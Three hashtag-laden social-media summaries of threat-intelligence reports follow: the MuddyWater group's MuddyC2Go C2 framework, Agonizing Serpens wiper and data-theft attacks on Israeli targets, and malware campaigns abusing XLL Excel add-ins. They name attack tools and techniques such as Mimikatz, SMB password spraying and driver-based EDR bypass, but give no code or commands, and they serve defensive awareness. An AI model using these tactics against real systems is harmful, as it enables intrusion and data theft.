https://bit.ly/3SDOVXl - 🕵️ Deep Instinct's Threat Research team has uncovered a new Command and Control (C2) framework, dubbed MuddyC2Go, believed to be used by the Iranian APT group MuddyWater. This C2 framework, written in Go, has possibly been active since 2020, replacing the group's earlier framework, PhonyC2. The discovery of MuddyC2Go highlights the evolving tactics of cyber threat actors. #MuddyC2Go #CyberSecurity #APT #IranianCyberThreats 🔍 The shift from PhonyC2 to MuddyC2Go was identified through anomalies in IP addresses previously associated with MuddyWater, revealing new behaviors and tactics. Deep Instinct's findings suggest a strategic evolution in MuddyWater's operations, highlighting the need for continuous monitoring and analysis of cyber threat actors' methodologies. #CyberThreatIntelligence #DeepInstinct #CyberAttackTrends 💻 Recent MuddyWater activities using MuddyC2Go involve spear-phishing emails with password-protected archives containing executables. These executables run embedded PowerShell scripts that connect to MuddyC2Go servers, indicating a move towards more sophisticated and automated attack methods. #SpearPhishing #Malware #CyberDefense 🌍 Deep Instinct's research has linked attacks using MuddyC2Go to various geographic locations, including a Jordanian company, an Iraqi telecommunications provider, and potential targets in Israel during the recent conflict. This geographical spread underscores the global reach and potential impact of MuddyWater's cyber operations. #GlobalCyberThreats #InfoSec #GeopoliticalCyberRisks 📡 In their investigation, Deep Instinct traced the MuddyC2Go framework back to 2020 and identified multiple IP addresses linked to MuddyWater's operations. These findings are supported by reports from other security firms, further validating the ongoing and evolving threat posed by this APT group. #CyberThreatResearch #IPAnalysis #CyberSecurityAwareness 🔗 The MuddyC2Go framework is challenging to fingerprint due to its generic appearance, similar to other web applications written in Go. However, unique URL patterns generated by the framework have helped Deep Instinct identify past attacks. This demonstrates the importance of detailed analysis in cybersecurity threat identification. #CyberForensics #ThreatHunting #CyberAnalysis 🛡️ Deep Instinct recommends disabling PowerShell if it's not needed or closely monitoring its activity if enabled, as PowerShell is a key component of MuddyWater's operations. The team's ongoing research and monitoring of MuddyC2Go servers provide vital insights for the cybersecurity community in combatting such threats.

https://bit.ly/3MC9n77 - 🔒 Cybersecurity researchers have identified a series of cyberattacks by the Iranian-backed Advanced Persistent Threat (APT) group “Agonizing Serpens,” targeting the Israeli education and tech sectors. The group aims to steal sensitive data for various purposes, including financial gain, identity theft, espionage, and causing disruption. These attacks involve rendering endpoints unusable and sometimes publishing stolen information on social media platforms. #Cybersecurity #APTGroups #DataTheft 🕵️‍♂️ Agonizing Serpens, active since 2020, employs sophisticated methods such as wipers and fake ransomware. Known by other names like Agrius, BlackShadow, and Pink Sandstorm, the group initially gains access through web server exploitation and deploys web shells for reconnaissance and network mapping. Tools like Nbtscan, WinEggDrop, and NimScan are commonly used for this purpose. #DigitalEspionage #HackerTactics #NetworkSecurity 🔐 The group's attack strategies include trying to gain admin credentials using methods like Mimikatz, SMB password spraying, and dumping the SAM file. They also use tools like Plink, WinSCP, and a custom sqlextractor for lateral movement and data exfiltration, targeting personal information like ID numbers and passport scans. Despite their efforts, many of their methods were blocked by Cortex XDR, showcasing the evolving battle between cybersecurity defenses and hacker tactics. #CyberDefense #DataExfiltration #InfoSec 🖥️ Agonizing Serpens has shown increased sophistication by employing new techniques to bypass Endpoint Detection and Response (EDR) systems. They developed custom tools like agmt.exe, a loader for the GMER driver, to terminate specific target processes. After failing to exploit the GMER driver, they turned to drvIX, leveraging a vulnerable driver from a public Proof of Concept (PoC) tool. #MalwareDevelopment #EDRBypass #CyberAttackTrends 💥 Unit 42 researchers discovered new wipers and tools used by Agonizing Serpens, including MultiLayer wiper, PartialWasher wiper, and BFG Agonizer wiper, as well as Sqlextractor, a custom tool for extracting information from database servers. These discoveries indicate the group's continual development of new tools to enhance their data theft and disruption capabilities.

https://bit.ly/47f9rS9 - 🔒Cybercriminals are exploiting macro-enabled Excel add-in (XLL) files, with .xlam files now ranking as the 7th most commonly abused extension in Q3 2023. A significant rise from the 42nd position in Q2, this trend signals an increased focus on XLL attacks, despite a previous decline in early 2023. #Cybersecurity #XLLThreat 🚀 XLL files, offering enhanced capabilities over alternatives like VBA macros, are being used more effectively by attackers due to features like multithreading support. Notably, malware developers such as Dridex and Formbook have previously adopted XLL files. The increased functionality of XLLs makes them a potent tool for cyberattacks. #MalwareDevelopment #TechSecurity 📊 After Microsoft’s default block on VBA macros, attackers shifted focus, experimenting with different file types for malware attacks. Microsoft Office documents, often perceived as safe, are increasingly being used as mediums for malware distribution. #MicrosoftSecurity #OfficeSafety 📁 Post VBA macro block, .LNK files, OneNote file experimentation, along with ISO and RAR attachments, surfaced as alternatives. The resurgence of XLL file use, despite Microsoft’s default block on XLL attachments from untrusted locations, is particularly noteworthy. #FileSecurity #CyberAttackTrends 🛡️ Attackers have successfully bypassed XLL blocks, as demonstrated in a remote access trojan (RAT) campaign using XLL attachments disguised as scanned invoices. The multithreading capability of add-ins was exploited to deploy payloads and increase the perceived legitimacy of the file. #RATAttack #CyberDefense 💼 The Parallax RAT, available for purchase, offers attackers remote control access, data exfiltration, and credential theft. Similar tactics were used in a campaign targeting LATAM hotels, installing XWorm RAT via PowerPoint add-in files. XWorm’s capabilities extend to keylogging and clipboard hijacking. #DataTheft #CybercrimeTactics 🌎 Separate XWorm attacks, targeting various industries in the US, Republic of Korea, and Germany, utilized malicious URLs embedded in .pdf, .docx, and .rtf formats. These evolving techniques highlight the need for continuous vigilance and adaptive security measures.